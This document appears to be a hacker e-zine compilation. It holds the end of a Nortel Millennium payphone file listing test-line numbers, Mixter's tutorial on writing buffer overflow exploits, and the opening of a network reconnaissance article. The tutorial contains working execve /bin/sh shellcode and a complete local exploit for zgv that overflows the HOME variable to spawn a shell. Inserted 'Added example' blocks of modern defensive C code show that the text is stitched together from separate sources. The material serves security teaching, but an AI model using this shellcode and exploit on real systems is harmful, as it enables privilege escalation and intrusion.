- 8-line x 20-character easy-to-read display catches the attention of passersby,
- providing a strong promotional and advertising medium. Soft keys support
- interactive phone-based transactions. And graphical images that change whenever
- the receiver goes on-hook or off-hook entice the customer to interact -- all at
- the touch of a button.
-
- The M1361
-
- Millennium offers an attractive alternative for nontraditional
- payphone locations, such as a waiting room table, lobby counter or the wall in a
- VIP lounge. With its distinctive style and small footprint, the Millennium Desk
- Set delivers all the features, convenience, reliability and security you find in
- Millennium wall-mounted terminals. And it becomes a mobile office -- or home
- away from home - by providing an advanced card reader along with an RJ-11 data
- jack so callers can plug in a laptop computer. An illuminated display and Quick
- Access Keys tell the customer this is more than just a phone. Caller-controlled
- features such as language selection, volume control and a Next Call button make
- using this terminal a comfortable, hassle-free experience.
-
- The M1400 and M1410
-
- Millennium offers correctional facilities what they need
- most -- flexibility and control of inmate communications. Powerful phone
- monitoring and reporting capabilities provide on-line access to management
- information. That means you can adjust payphone functions - such as curfew
- periods, call duration, and changes to call screening lists or personal
- identification numbers (PINs). And you can make these changes without having to
- call your service provider. The Millennium Inmate System also tackles phone
- fraud and illegal activities head-on with capabilities that provide
- unprecedented control over payphone access and usage. And self-diagnostics built
- into each Millennium Inmate Terminal virtually eliminate out-of-service
- situations.
-
- The Millennium Kiosk
-
- The Kiosk represents a new way for you to reach your customers at all
- times, allowing you to deliver email accessibility, web browsing, online
- services, the printing of items such as tickets or vouchers and more. The
- Kiosk's advanced design offers robust and ergonomic terminals designed for
- public use, with open application delivery platforms that feature
- non-proprietary, standards-based architecture. Plus, they are easy to maintain
- with network-based administration that allows the centralized management and
- updates of terminals. You can use the Kiosk to take advantage of your Internet
- and Call Center applications knowing that customers can use this public
- communications device to access your organization. That can mean more revenue
- for you because your business never closes and can operate 24 hours a day, 7
- days a week!
-
- Here is some information and some phone numbers about Nortel that I think some
- people out there might like. Their full corporate name is Nortel Networks
- Corporation. They are listed on the New York, Toronto and London stock
- exchanges. The 1998 revenues were US $17.6 billion and the 1998 earnings were
- US $1.07 billion. They employ approximately 70,000 people worldwide. The CEO is
- John Roth (President and Chief Executive Officer). The CFO is Frank A. Dunn
- (Senior Vice President and Chief Financial Officer). The CIO is Keith Powell
- (Chief Information Officer). The CMO is John A. (Ian) Craig (Executive Vice
- President and Chief Marketing Officer). The CTO is Bill Hawe (Senior Vice
- President and Chief Technology Officer). The corporate headquarters is at 8200
- Dixie Road, Suite 100, Brampton, Ontario L6T 5P6, Canada, 905-863-0000.
-
- 1-800-263-7412   Bell Canada Millennium (Help Line)
- 1-800-567-2448   Bell Canada Millennium (Test Line)
- 1-800-461-1747   Bell Canada Millennium (Voice Test)
- 1-800-461-1879   Bell Canada Millennium (Data Test)
- 1-800-772-2141   Bell Canada Millennium (Setshop)
- 1-800-668-4862   Bell Canada Millennium (Coin)
- 1-800-466-7835   Millennium sales representative
- 1-214-684-5930   Millennium sales representative
- 1-416-748-2694   Bell Canada, Pay phone Department
-
- Well, that's all. I hope you enjoyed the file and you get some good use out of
- it. I would like to dedicate this file to my loving girlfriend; without her
- support I could not have made this happen. I would also like to thank all the
- people who helped me along the way with this file; you know who you all are. If
- anyone wants to contact me, e-mail me at: circuitpimp@hotmail.com
-
- http://www.ppchq.org
-
-
-
- ==================[Writing Buffer Overflow Exploits]=====================
- ==================[ by mixter ]=====================
-
-
-
- Buffer overflows in user input dependent buffers have become one of the biggest
- security hazards on the internet and to modern computing in general. This is
- because such an error can easily be made at programming level, and while
- invisible to the user who does not understand or cannot acquire the source
- code, many of those errors are easy to exploit. This paper makes an attempt to
- teach the novice to average C programmer how an overflow condition can be proven
- to be exploitable.
-
- Mixter
-
- 1. Memory
-
- Note: The way I describe it here is how memory for a process is organized on
- most computers; however, it depends on the type of processor architecture. This
- example is for x86 and also roughly applies to SPARC.
-
- The principle of exploiting a buffer overflow is to overwrite parts of memory
- which aren't supposed to be overwritten by arbitrary input and make the
- process execute this code. To see how and where an overflow takes place, let's
- take a look at how memory is organized. A page is a part of memory that uses its
- own relative addressing, meaning the kernel allocates initial memory for the
- process, which it can then access without having to know where the memory is
- physically located in RAM. The process's memory consists of three sections:
-
- - code segment, data in this segment are assembler instructions that the
- processor executes. The code execution is non-linear; it can skip code, jump,
- and call functions on certain conditions. Therefore, we have a pointer called
- EIP, or instruction pointer. The address EIP points to always contains the
- code that will be executed next.
-
- - data segment, space for variables and dynamic buffers
-
- - stack segment, which is used to pass data (arguments) to functions and as a
- space for variables of functions. The bottom (start) of the stack usually
- resides at the very end of the virtual memory of a page, and grows down. The
- assembler command PUSHL will add to the top of the stack, and POPL will remove
- one item from the top of the stack and put it in a register. For accessing the
- stack memory directly, there is the stack pointer ESP that points at the top
- (lowest memory address) of the stack.
-
- 2. Functions
-
- A function is a piece of code in the code segment, that is called, performs a
- task, and then returns to the previous thread of execution. Optionally,
- arguments can be passed to a function. In assembler, it usually looks like this
- (very simple example, just to get the idea):
-
- memory address          code
- 0x8054321 <main+x>      pushl $0x0
- 0x8054322               call $0x80543a0 <function>
- 0x8054327               ret
- 0x8054328               leave
- ...
- 0x80543a0 <function>    popl %eax
- 0x80543a1               addl $0x1337,%eax
- 0x80543a4               ret
-
- What happens here? The main function calls function(0); the argument is 0, main
- pushes it onto the stack, and calls the function. The function gets the variable
- from the stack using popl. After finishing, it returns to 0x8054327. Commonly,
- the main function would always push register EBP on the stack, which the
- function stores, and restores after finishing. This is the frame pointer
- concept, which allows the function to use its own offsets for addressing; it is
- mostly uninteresting while dealing with exploits, because the function will not
- return to the original execution thread anyways. :-) We just have to know what
- the stack looks like. At the top, we have the internal buffers and variables of
- the function. After this, there is the saved EBP register (32 bit, which is 4
- bytes), and then the return address, which is again 4 bytes. Further down, there
- are the arguments passed to the function, which are uninteresting to us. In this
- case, our return address is 0x8054327. It is automatically stored on the stack
- when the function is called. This return address can be overwritten, and changed
- to point to any point in memory, if there is an overflow somewhere in the code.
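An added example (not from mixter's paper): a C program that checks the frame layout just described without reaching for a debugger. It relies on the GCC/Clang builtins __builtin_frame_address and __builtin_return_address, which are assumed to be available; everything else is standard C, and no address in it is taken from the text.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Snapshot of where one function's pieces sit, in the order the text gives:
 * local buffer, saved frame pointer (EBP), then the return address slot. */
typedef struct {
    uintptr_t buf_start;    /* first byte of the local buffer                */
    uintptr_t saved_fp;     /* slot holding the caller's frame pointer       */
    uintptr_t ret_slot;     /* slot holding the return address               */
    int       ret_verified; /* 1 if ret_slot really holds our return address */
} frame_layout;

/* noinline keeps this a real call with its own frame, like lame() in 3. */
__attribute__((noinline)) frame_layout inspect_frame(void)
{
    char small[30];
    frame_layout f;

    memset(small, 'A', sizeof small);
    f.buf_start = (uintptr_t)small;

    /* __builtin_frame_address(0) is this function's frame pointer; the slot it
     * points at is where the caller's EBP/RBP was saved by "pushl %ebp". */
    f.saved_fp = (uintptr_t)__builtin_frame_address(0);

    /* CALL pushed the return address just before the frame pointer was saved,
     * so it sits one pointer-sized slot above the saved frame pointer. */
    f.ret_slot = f.saved_fp + sizeof(void *);

    /* Cross-check against the compiler's own view of the return address. */
    f.ret_verified =
        (*(volatile uintptr_t *)f.ret_slot == (uintptr_t)__builtin_return_address(0));

    if (small[0] != 'A')    /* keep small[] live so it stays on the stack */
        f.buf_start = 0;
    return f;
}

/* Signed distance from the start of the buffer to just past the return
 * address slot. On x86 the buffer lies below the saved frame pointer, so this
 * is how many bytes of input it takes to cover the return address (the
 * "32 + 4 + 4" worked out for lame()). On ABIs that place the frame record
 * below the locals (AArch64, for instance) it comes out negative: an overflow
 * of this buffer runs away from this frame's return address. */
long bytes_to_pass_ret(const frame_layout *f)
{
    return (long)(f->ret_slot + sizeof(void *)) - (long)f->buf_start;
}

int main(void)
{
    frame_layout f = inspect_frame();
    printf("buffer starts at        %#lx\n", (unsigned long)f.buf_start);
    printf("saved frame pointer at  %#lx\n", (unsigned long)f.saved_fp);
    printf("return address slot at  %#lx (verified=%d)\n",
           (unsigned long)f.ret_slot, f.ret_verified);
    printf("bytes from buffer to just past RET: %ld\n", bytes_to_pass_ret(&f));
    return 0;
}
```

On 32-bit x86 the two slots are 4 bytes each, on x86-64 8 bytes, so the last line is the buffer-plus-EBP-plus-RET figure the text works out by hand. Compiling with -fstack-protector puts a canary word between the buffer and the saved frame pointer, which shows up here as a larger distance; that gap is exactly what stops the 'xxxx' overwrite in 3a from reaching the return address unnoticed.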
-
- 3. Example of an exploitable program
-
- Let's assume that we exploit a function like this:
-
- #include <stdio.h>
-
- void lame(void)
- {
-     char small[30];
-     gets(small);            /* no length limit: this is the overflow */
-     printf("%s\n", small);
- }
-
- int main(void)
- {
-     lame();
-     return 0;
- }
-
- Compile and disassemble it:
-
- # cc -ggdb blah.c -o blah
- /tmp/cca017401.o: In function `lame':
- /root/blah.c:1: the `gets' function is dangerous and should not be used.
- # gdb blah
- /* short explanation: gdb, the GNU debugger, is used here to read the binary
-    file and disassemble it (translate bytes to assembler code) */
- (gdb) disas main
- Dump of assembler code for function main:
- 0x80484c8 <main>:     pushl %ebp
- 0x80484c9 <main+1>:   movl %esp,%ebp
- 0x80484cb <main+3>:   call 0x80484a0 <lame>
- 0x80484d0 <main+8>:   leave
- 0x80484d1 <main+9>:   ret
-
- (gdb) disas lame
- Dump of assembler code for function lame:
- /* saving the frame pointer onto the stack right before the ret address */
- 0x80484a0 <lame>:     pushl %ebp
- 0x80484a1 <lame+1>:   movl %esp,%ebp
- /* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the memory
-    is allocated 4byte-wise (because the processor uses 32bit words); this is
-    the equivalent to: char small[30]; */
- 0x80484a3 <lame+3>:   subl $0x20,%esp
- /* load a pointer to small[30] (the space on the stack, which is located at
-    virtual address 0xffffffe0(%ebp)) on the stack, and call the gets function:
-    gets(small); */
- 0x80484a6 <lame+6>:   leal 0xffffffe0(%ebp),%eax
- 0x80484a9 <lame+9>:   pushl %eax
- 0x80484aa <lame+10>:  call 0x80483ec <gets>
- 0x80484af <lame+15>:  addl $0x4,%esp
- /* load the address of small and the address of the "%s\n" string on the stack
-    and call the print function: printf("%s\n", small); */
- 0x80484b2 <lame+18>:  leal 0xffffffe0(%ebp),%eax
- 0x80484b5 <lame+21>:  pushl %eax
- 0x80484b6 <lame+22>:  pushl $0x804852c
- 0x80484bb <lame+27>:  call 0x80483dc <printf>
- 0x80484c0 <lame+32>:  addl $0x8,%esp
- /* get the return address, 0x80484d0, from the stack and return to that
-    address. you don't see that explicitly here because it is done by the CPU
-    as 'ret' */
- 0x80484c3:            leave
- 0x80484c4:            ret
- End of assembler dump.
-
- 3a. Overflowing the program
-
- # ./blah
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- # ./blah
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- Segmentation fault (core dumped)
- # gdb blah core
- (gdb) info registers
- eax: 0x24        36
- ecx: 0x804852f   134513967
- edx: 0x1         1
- ebx: 0x11a3c8    1156040
- esp: 0xbffffdb8  -1073742408
- ebp: 0x787878    7895160
-
- EBP is 0x787878, which means that we have written more data on the stack than
- the input buffer could handle. 0x78 is the hex representation of 'x'. The
- process had a buffer of 32 bytes maximum size. We have written more data into
- memory than was allocated for user input and therefore overwritten EBP and the
- return address with 'xxxx', and the process tried to resume execution at address
- 0x787878, which caused it to get a segmentation fault.
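Added example, not part of the original paper: the lame() function from section 3 next to a bounded version. The overflow exists because gets() has no idea how big small[] is; the fix is fgets() with the buffer size, plus explicit handling of a line that did not fit, which is the part that usually gets forgotten. The sample input and the tmpfile() driver are constructed here so the whole thing runs offline; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

#define SMALL_LEN 30

typedef enum { LINE_OK, LINE_TRUNCATED, LINE_EOF } line_status;

/* Bounded replacement for gets(small): reads at most cap-1 bytes, always
 * NUL-terminates, and reports when the line did not fit. The rest of an
 * overlong line is drained so the next read starts on a fresh line instead
 * of on the leftover tail. */
line_status read_line_bounded(FILE *in, char *dst, size_t cap)
{
    int c;
    size_t n;

    if (cap == 0)
        return LINE_EOF;
    if (fgets(dst, (int)cap, in) == NULL) {
        dst[0] = '\0';
        return LINE_EOF;
    }
    n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';            /* strip the newline, as gets() did */
        return LINE_OK;
    }
    /* No newline: either the input ended without one, or the line was longer
     * than the buffer. Peeking one byte tells the two apart. */
    c = fgetc(in);
    if (c == EOF)
        return LINE_OK;
    while (c != '\n' && c != EOF)     /* discard the part that did not fit */
        c = fgetc(in);
    return LINE_TRUNCATED;
}

/* Hardened lame(): same output for well-formed input, but an overlong line
 * can no longer run past the buffer into the saved EBP and the return
 * address. Takes the stream and buffer as parameters so it can be driven
 * from a test instead of from stdin. */
line_status lame_safe(FILE *in, char *out, size_t cap)
{
    line_status st = read_line_bounded(in, out, cap);

    if (st == LINE_TRUNCATED)
        fprintf(stderr, "line longer than %zu bytes, truncated\n", cap - 1);
    if (st != LINE_EOF)
        printf("%s\n", out);
    return st;
}

/* Constructed input: the 3a-style overlong run of 'x', then a normal line. */
static const char SAMPLE_INPUT[] =
    "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n"
    "hello\n";

/* Runs both lines of SAMPLE_INPUT through lame_safe(). Returns 1 when the
 * long line was cut to SMALL_LEN-1 bytes and reported, and the short line
 * after it still came through intact. */
int sample_behaves_safely(void)
{
    char first[SMALL_LEN], second[SMALL_LEN];
    line_status st1, st2;
    FILE *in = tmpfile();             /* standard C scratch file for the sample */

    if (in == NULL)
        return 0;
    fputs(SAMPLE_INPUT, in);
    rewind(in);
    st1 = lame_safe(in, first, sizeof first);
    st2 = lame_safe(in, second, sizeof second);
    fclose(in);
    return st1 == LINE_TRUNCATED && strlen(first) == SMALL_LEN - 1
        && st2 == LINE_OK && strcmp(second, "hello") == 0;
}

int main(void)
{
    printf("bounded read behaved safely: %d\n", sample_behaves_safely());
    return 0;
}
```

Feeding the same 35 'x' line from 3a into lame_safe() leaves EBP and the return address untouched: fgets() stops at 29 bytes, the remainder is thrown away, and the caller is told that it happened instead of silently working on a clipped string.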
-
- 3b. Changing the return address
-
- Let's try to exploit the program to return into the call to lame() instead of
- returning normally. We have to change the return address 0x80484d0 to
- 0x80484cb, that is all. In memory, we have:
-
- 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET
-
- Here is a simple program to put the 4-byte return address into a 1-byte
- character buffer:
-
- #include <stdio.h>
- #include <stdint.h>
-
- int main(void)
- {
-     int i = 0;
-     char buf[45];            /* 44 bytes of addresses plus a terminator */
-
-     /* repeat the 4-byte address (uint32_t, since long is 8 bytes on 64-bit
-        hosts) over the buffer, the saved EBP and the return address */
-     for (i = 0; i <= 40; i += 4)
-         *(uint32_t *)&buf[i] = 0x80484cb;
-     buf[44] = '\0';          /* so puts() stops at the end of the addresses */
-     puts(buf);
-     return 0;
- }
-
- # ret
- ╦╦╦╦╦╦╦╦╦╦╦,
-
- # (ret;cat)|./blah
- test
- ╦╦╦╦╦╦╦╦╦╦╦,test
- test
- test
-
- Here we are, the program went through the function two times. If an overflow is
- present, the return address of functions can be changed to alter the program's
- execution thread.
-
- 4. Shellcode
-
- To keep it simple, shellcode is simply assembler commands, which we write on the
- stack and then change the return address to return to the stack. Using this
- method, we can insert code into a vulnerable process and then execute it right
- on the stack. So, let's generate insertable assembler code to run a shell. A
- common system call is execve(), which loads and runs any binary, terminating
- execution of the current process. The manpage gives us the usage:
-
- int execve(const char *filename, char *const argv[], char *const envp[]);
-
- Let's get the details of the system call from glibc2:
-
- # gdb /lib/libc.so.6
- (gdb) disas execve
- Dump of assembler code for function execve:
- 0x5da00 <execve>:     pushl %ebx
- /* this is the actual syscall. before a program would call execve, it would
-    push the arguments in reverse order on the stack: **envp, **argv, *filename */
- /* put address of **envp into edx register */
- 0x5da01 <execve+1>:   movl 0x10(%esp,1),%edx
- /* put address of **argv into ecx register */
- 0x5da05 <execve+5>:   movl 0xc(%esp,1),%ecx
- /* put address of *filename into ebx register */
- 0x5da09 <execve+9>:   movl 0x8(%esp,1),%ebx
- /* put 0xb in eax register; 0xb == execve in the internal system call table */
- 0x5da0d <execve+13>:  movl $0xb,%eax
- /* give control to kernel, to execute execve instruction */
- 0x5da12 <execve+18>:  int $0x80
- 0x5da14 <execve+20>:  popl %ebx
- 0x5da15 <execve+21>:  cmpl $0xfffff001,%eax
- 0x5da1a <execve+26>:  jae 0x5da1d <__syscall_error>
- 0x5da1c <execve+28>:  ret
- End of assembler dump.
-
- 4a. making the code portable
-
- We have to apply a trick to be able to make shellcode without having to
- reference the arguments in memory the conventional way, by giving their exact
- address on the memory page, which can only be done at compile time. Once we can
- estimate the size of the shellcode, we can use the instructions jmp <bytes> and
- call <bytes> to go a specified number of bytes back or forth in the execution
- thread. Why use a call? We take advantage of the fact that a CALL automatically
- stores the return address on the stack, the return address being the address
- right after the CALL instruction. By placing a variable right behind the call,
- we indirectly push its address on the stack without having to know it.
-
-
- 0      jmp <Z>          (skip Z bytes forward)
- 2      popl %esi
-        ... put function(s) here ...
- Z      call <-Z+2>      (skip 2 less than Z bytes backward, to POPL)
- Z+5    .string          (first variable)
-
- (Note: If you're going to write code more complex than for spawning a simple
- shell, you can put more than one .string behind the code. You know the size of
- those strings and can therefore calculate their relative locations once you know
- where the first string is located.)
-
- 4b. the shellcode
-
-
- .globl code_start         /* we'll need this later, don't mind it */
- .globl code_end
- .data
- code_start:
-         jmp 0x17
-         popl %esi
-         movl %esi,0x8(%esi)   /* put address of **argv behind shellcode,
-                                  0x8 bytes behind it so a /bin/sh has place */
-         xorl %eax,%eax        /* put 0 in %eax */
-         movb %al,0x7(%esi)    /* put terminating 0 after /bin/sh string */
-         movl %eax,0xc(%esi)   /* another 0 to get the size of a long word */
- my_execve:
-         movb $0xb,%al         /* execve( */
-         movl %esi,%ebx        /* "/bin/sh", */
-         leal 0x8(%esi),%ecx   /* & of "/bin/sh", */
-         xorl %edx,%edx        /* NULL */
-         int $0x80             /* ); */
-         call -0x1c
-         .string "/bin/shX"    /* X is overwritten by movb %al,0x7(%esi) */
- code_end:
-
- (The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling,
- disassembling and then looking at the shell codes size.)
-
- This is already working shellcode, though very minimal. You should at least
- disassemble the exit() syscall and attach it (before the 'call'). The real art
- of making shellcode also consists of avoiding any binary zeroes in the code
- (they very often indicate the end of input/buffer) and modifying it, for
- example, so the binary code does not contain control or lower characters, which
- would get filtered out by some vulnerable programs. Most of this stuff is done
- by self-modifying code, like we had in the movb %al,0x7(%esi) instruction. We
- replaced the X with \0, but without having a \0 in the shellcode initially...
-
- Let's test this code... save the above code as code.S (remove comments) and the
- following file as code.c:
-
- #include <stdio.h>
- extern void code_start();
- extern void code_end();
-
- int main(void)
- {
-     ((void (*)(void)) code_start)();
-     return 0;
- }
-
- # cc -o code code.S code.c
- # ./code
- bash#
-
- You can now convert the shellcode to a hex char buffer. The best way to do this
- is to print it out:
-
- #include <stdio.h>
- extern void code_start();
- extern void code_end();
-
- int main(void)
- {
-     fprintf(stderr, "%s", (char *) code_start);
-     return 0;
- }
-
- and parse it through aconv -h or bin2c.pl; those tools can be found at:
- http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
-
- 5. Writing an exploit
-
- Let us take a look at how to change the return address to point to shellcode put
- on the stack, and write a sample exploit. We will take zgv, because that is one
- of the easiest things to exploit out there :)
-
-
- # export HOME=`perl -e 'printf "a" x 2000'`
- # zgv
- Segmentation fault (core dumped)
- # gdb /usr/bin/zgv core
- #0 0x61616161 in ?? ()
- (gdb) info register esp
- esp: 0xbffff574 -1073744524
-
- Well, this is the top of the stack at crash time. It is safe to presume that we
- can use this as return address to our shellcode.
-
- We will now add some NOP (no operation) instructions before our buffer, so we
- don't have to be 100% correct regarding the prediction of the exact start of our
- shellcode in memory (or even brute force it). The function will return onto
- the stack somewhere before our shellcode, work its way through the NOPs to the
- initial JMP command, jump to the CALL, jump back to the popl, and run our code on
- the stack.
-
- Remember, the stack looks like this: at the lowest memory address, the top of
- the stack where ESP points to, the initial variables are stored, namely the
- buffer in zgv that stores the HOME environment variable. After that, we have the
- saved EBP(4bytes) and the return address of the previous function. We must write
- 8 bytes or more behind the buffer to overwrite the return address with our new
- address on the stack.
-
- The buffer in zgv is 1024 bytes big. You can find that out by glancing at the
- code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable
- function. We will now put all those parts together in the exploit:
-
- 5a. Sample zgv exploit
-
- /* zgv v3.0 exploit by Mixter
-    buffer overflow tutorial - http://1337.tsx.org
-
-    sample exploit, works for example with precompiled redhat 5.x/suse 5.x/redhat
-    6.x/slackware 3.x linux binaries */
-
- #include <stdio.h>
- #include <string.h>      /* strlen, memcpy */
- #include <unistd.h>
- #include <stdlib.h>
- #include <stdint.h>
-
- /* This is the minimal shellcode from the tutorial */
- static char shellcode[]=
- "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
- "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
-
- #define NOP 0x90
- #define LEN 1032
- #define RET 0xbffff574
-
- int main(void)
- {
-     char buffer[LEN + 1];        /* one extra byte for the terminating NUL */
-     uint32_t retaddr = RET;      /* 4-byte return address on 32-bit x86 */
-     int i;
-
-     fprintf(stderr,"using address 0x%lx\n",(unsigned long)retaddr);
-
-     /* this fills the whole buffer with the return address, see 3b) */
-     for (i=0;i<LEN;i+=4)
-         *(uint32_t *)&buffer[i] = retaddr;
-
-     /* this fills the initial buffer with NOP's, 100 chars less than the buffer
-        size, so the shellcode and return address fit in comfortably */
-     for (i=0;i<(LEN-strlen(shellcode)-100);i++)
-         *(buffer+i) = NOP;
-
-     /* after the end of the NOPs, we copy in the execve() shellcode */
-     memcpy(buffer+i,shellcode,strlen(shellcode));
-     buffer[LEN] = '\0';          /* setenv() needs a terminated string */
-
-     /* export the variable, run zgv */
-     setenv("HOME", buffer, 1);
-     execlp("zgv","zgv",NULL);
-     return 0;
- }
-
- /* EOF */
-
- We now have a string looking like this:
-
- [ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]
-
- While zgv's stack looks like this:
-
-                          v-- 0xbffff574 is here
- [ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]
-
- The execution thread of zgv is now as follows:
-
- main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));
-
- At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and
- the return address to main is overwritten with the return address on the stack.
- function() does leave/ret and the EIP points onto the stack:
-
- 0xbffff574   nop
- 0xbffff575   nop
- 0xbffff576   nop
- 0xbffff577   jmp $0x24
- 0xbffff579   popl %esi
- [... shellcode starts here ...]
- 0xbffff59b   call -$0x1c
- 0xbffff59e   .string "/bin/shX"
-
- Let's test the exploit...
-
- # cc -o zgx zgx.c
- # ./zgx
- using address 0xbffff574
- bash#
-
- 5b. further tips on writing exploits
-
- There are a lot of programs which are tough to exploit, but nonetheless
- vulnerable. However, there are a lot of tricks you can do to get behind
- filtering and such. There are also other overflow techniques which do not
- necessarily include changing the return address at all, or only the return
- address. There are so-called pointer overflows, where a pointer that a function
- allocates can be overwritten by an overflow, altering the program's execution
- flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return
- address points to the shell's environment pointer, where the shellcode is
- located instead of being on the stack (this defeats very small buffers and
- non-executable stack patches, and can fool some security programs, though it can
- only be performed locally). Another important subject for the skilled shellcode
- author is radically self-modifying code, which initially only consists of
- printable, non-white upper case characters, and then modifies itself to put
- functional shellcode on the stack which it executes, etc. You should never, ever
- have any binary zeroes in your shellcode, because it will most likely not work
- if it contains any. But discussing how to substitute certain assembler commands
- with others would go beyond the scope of this paper. I also suggest reading the
- other great overflow howtos out there, written by aleph1, Taeoh Oh and mudge.
-
- 5c. important note
-
- You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me
- for cc.exe and gdb.exe either! =oP
-
- 6. Conclusions
-
- We have learned that once an overflow is present which is user dependent, it
- can be exploited about 90% of the time, even though exploiting some situations
- is difficult and takes some skill. Why is it important to write exploits?
- Because ignorance is omnipresent in the software industry. There have already
- been reports of vulnerabilities due to buffer overflows in software, yet the
- software has not been updated, or the majority of users didn't update, because
- the vulnerability was hard to exploit and nobody believed it created a security
- risk. Then an exploit actually comes out, proves and practically demonstrates
- that a program is exploitable, and there is usually a big (necessary) hurry to
- update it.
-
- As for the programmer (you), it is a hard task to write secure programs, but it
- should be taken very seriously. This is an especially large concern when
- writing servers, any type of security program, or programs that are suid root,
- or designed to be run by root, by special accounts, or by the system itself.
- The main principles I suggest: apply bounds checking (strn*, sn* functions
- instead of sprintf etc.), prefer allocating buffers of a dynamic,
- input-dependent size, be careful with for/while/etc. loops that gather data and
- stuff it into a buffer, and generally handle user input with very much care.
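As an added example (not from Mixter's paper), here is the unbounded strcpy() pattern that the zgv exploit relies on, beside the bounded alternatives the conclusion recommends; the buffer size, function names and sample inputs are constructed for the demonstration.

```c
/* Added example, not from the paper: the strcpy() pattern behind zgv's HOME
 * overflow next to bounded replacements (length check, snprintf, bounded
 * gathering loop). SMALLBUF and all inputs below are constructed. */
#include <stdio.h>
#include <string.h>

#define SMALLBUF 64   /* constructed: stands in for zgv's fixed HOME buffer */

/* The vulnerable pattern: strcpy() copies until the NUL and never asks how
 * big dst is, so an over-long $HOME runs past smallbuffer into the saved
 * EBP and the return address. Shown for contrast only. */
void copy_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);   /* never use with attacker-controlled src */
}

/* Hardened form 1: explicit length check. Returns 0 on success, -1 if src
 * plus its NUL does not fit; dst is left empty rather than half-filled. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened form 2: snprintf(), the paper's "sn*" advice. It always NUL
 * terminates, and its return value is the length it wanted to write, so a
 * return >= dstsz means the copy was truncated and must be reported. */
int copy_snprintf(char *dst, size_t dstsz, const char *src)
{
    int wanted = snprintf(dst, dstsz, "%s", src);
    if (wanted < 0 || (size_t)wanted >= dstsz)
        return -1;   /* truncated: an error, not something to ignore */
    return 0;
}

/* Hardened form 3: the data-gathering loop the paper warns about. Copies
 * bytes from in up to delim into buf, bounded by bufsz. Returns the count
 * stored, or -1 if the field would not fit (buf is emptied). */
int gather_field(const char *in, char delim, char *buf, size_t bufsz)
{
    size_t i = 0;
    if (bufsz == 0)
        return -1;
    while (in[i] != '\0' && in[i] != delim) {
        if (i + 1 >= bufsz) {        /* keep room for the terminating NUL */
            buf[0] = '\0';
            return -1;
        }
        buf[i] = in[i];
        i++;
    }
    buf[i] = '\0';
    return (int)i;
}

/* Mirrors zgv's strcpy(smallbuffer, getenv("HOME")) with the bounded copy.
 * Returns 0 if the value was accepted, -1 if rejected as over-long. */
int load_home(const char *home_value)
{
    char smallbuffer[SMALLBUF];
    if (home_value == NULL)
        return -1;
    return copy_bounded(smallbuffer, sizeof smallbuffer, home_value);
}

/* Constructed inputs: a sane HOME and one the size of a NOP sled. */
int demo_short_home(void) { return load_home("/home/user"); }
int demo_long_home(void)
{
    char longhome[4096];
    memset(longhome, 'A', sizeof longhome - 1);
    longhome[sizeof longhome - 1] = '\0';
    return load_home(longhome);
}

int main(void)
{
    printf("short HOME accepted: %d\n", demo_short_home());   /* 0 */
    printf("long HOME accepted:  %d\n", demo_long_home());    /* -1 */
    return 0;
}
```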
-
- The security industry has also made notable efforts to prevent overflow
- problems with techniques like non-executable stacks, suid wrappers, guard
- programs that check return addresses, bounds checking compilers, and so on.
- You should make use of those techniques where possible, but do not fully rely
- on them. Do not assume you are safe at all if you run a vanilla two-year-old
- UNIX distribution without updates but with overflow protection or (even more
- stupid) firewalling/IDS. It cannot assure security if you continue to use
- insecure programs, because _all_ security programs are _software_ and can
- contain vulnerabilities themselves, or at least not be perfect. If you apply
- frequent updates _and_ security measures, you still cannot expect to be
- secure, _but_ you can hope. :-)
-
- mixter@newyorkoffice.com http://members.tripod.com/mixtersecurity
-
-
-
- ===================[What You Don't Know Will Hurt You]===================
- ===================[ by Larry W. Cashdollar ]===================
-
-
-
- I. Overview
-
- The first stage of a successful network attack is the information gathering
- stage. The attacker will collect as much information as possible on the target
- host in order to generate a vulnerability list. Relevant to this list will be
- OS type, OS version, services, service daemon versions, network topology*,
- network equipment, firewalls, intrusion detection sensors etc. The purpose of
- this document is to outline two models of information gathering. The first
- model is "noisy", where the attacker uses all known resources with little
- regard for what footprints* might be left on the target. The second is
- "stealthy", wherein the attacker uses methods and packages designed to subvert
- logging facilities on the target. This approach minimizes administrator
- awareness and accountability. I will examine a few systems, ranging from
- Solaris 2.x Sparc systems to Linux/i386 architectures. I will then discuss how
- we can harden a system to minimize information leakage.
-
- II. Utilities and Packages
-
- The utilities we will use can range from common system commands to network
- information gathering packages like nmap. I will list a few below and give a
- brief description of each. In the resources section you will find sites and
- security indexes where search engines can dig up a myriad of network security
- tools. These are just a few.
-
- System Utilities.
-
- Utility      Description
- finger       Displays user information or the current users logged into the
-              specified host.
- rusers       Same as finger but in more detail.
- showmount    Displays directories available for mounting via NFS.
- rpcinfo      Makes a call to the rpc server and displays the information
-              gathered.
